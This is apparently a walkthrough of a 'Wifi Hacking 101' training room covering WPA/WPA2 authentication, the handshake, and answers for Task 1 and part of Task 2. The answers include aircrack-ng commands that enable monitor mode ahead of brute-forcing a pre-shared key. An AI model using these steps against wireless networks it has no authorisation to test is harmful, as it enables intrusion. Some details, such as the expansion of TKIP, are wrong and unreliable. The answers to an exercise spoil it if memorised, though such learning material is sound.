The Wifi Hacking 101 is a room for attacking WPA(2) Networks.
Before starting, what is WPA(2) Network?
So, WPA(Wi-Fi Protected Access) and WPA2 are the security mechanisms used for providing secure access to a wireless network. WPA was initially developed to replace WEP (Wired Equivalent Privacy) as it was found easy to crack and gain access. Later, WPA was also found to be insecure and WPA2 came as a replacement for it.
WPA is based on TKIP( Temporal Key Internet Protocol) whereas WPA2 is based on AES algorithm. Theoretically, AES Algorithm, on which the WPA2 is based on, is said to be unbreakable. Therefore, New Access Points usually use WPA2 encryption. Because of the algorithm complexity, it provides unbreakable security, however, it needs a huge processing power. This results in lag in old Access Points which have been upgraded to WPA2 with firmware upgrade sometimes leads to performance degradation.
Back to Wifi Hacking room.
The key terms used in the room are as below:
SSID: The name of the network that are displayed to connect to.
ESSID: The name that (may) apply to multiple access points such as an company.
BSSID: A Access Point MAC (hardware) address
WPA2-PSK: Wifi network to which you connect by providing a Pre Shared Key or a common password for everyone.
WPA2-EAP: Wifi network to which you connect by providing username and password which is authenticated by a Radius server, using 802.1x protocol.
Radius: It is a server for authenticating clients, not only for wifi.
HOW DOES WPA2 AUTHENTICATION WORK?
Most of the home wifi networks uses WPA(2) personal. If you have to provide username and password then it is WPA(2)-EAP.
WPA2 authentication works by using 4-way handshake method. Using the handshake, the client and the AP both proves that they have the knowledge of the key without divulging them.
The keys for the WPA are obtained from the ESSID and the password of the network. The ESSID acts as a salt and thus, makes the deduction of the keys more difficult.Therefore, the same password for the network will have different keys based on the value of the salt.
Now, to Wifi Hacking 101 room, Task 1: The basics-an intro to WPA
1.What type of attack on the encryption can you perform on WPA(2) personal?
Ans: On WPA(2) personal, the encryption is based on AES algorithm which is theoretically impossible to crack. Therefore, we use brute force and try every possible password to get the correct one.
2.Can this method be used to attack WPA2-EAP handshakes?
Ans: Nay, as the WPA2-EAP uses username and password.
3. What three letter abbreviation is the technical term for the “wifi code/password/passphrase”?
Ans: PSK (Pre-shared key).
4.What’s the minimum length of a WPA2 Personal password?
Ans: 8.
Task 2: You’re being watched- Capturing packets to attack
We use aircrack-ng, aerodump-ng, airmon-ng to attack the wifi network. The aircrack-ng tool comes by default with kali.
1.How do you put the interface “wlan0” into monitor mode with Aircrack tools? (Full command)
Ans: airmon-ng start wlan0
Before we hack the network, we need to put our wireless card to monitor mode. This monitor mode is a special mode which lets us listen to each packet. This mode also allows us to inject packet into network.
2. What is the new interface name likely to be after you enable monitor mode?
Ans: wlan0mon
Another interface will be created which will have mon appended to its name. To confirm if it really is in monitor mode, we can run the iwconfig command.
3.What do you do if other processes are currently trying to use that network adapter?
Ans: airmon-ng check kill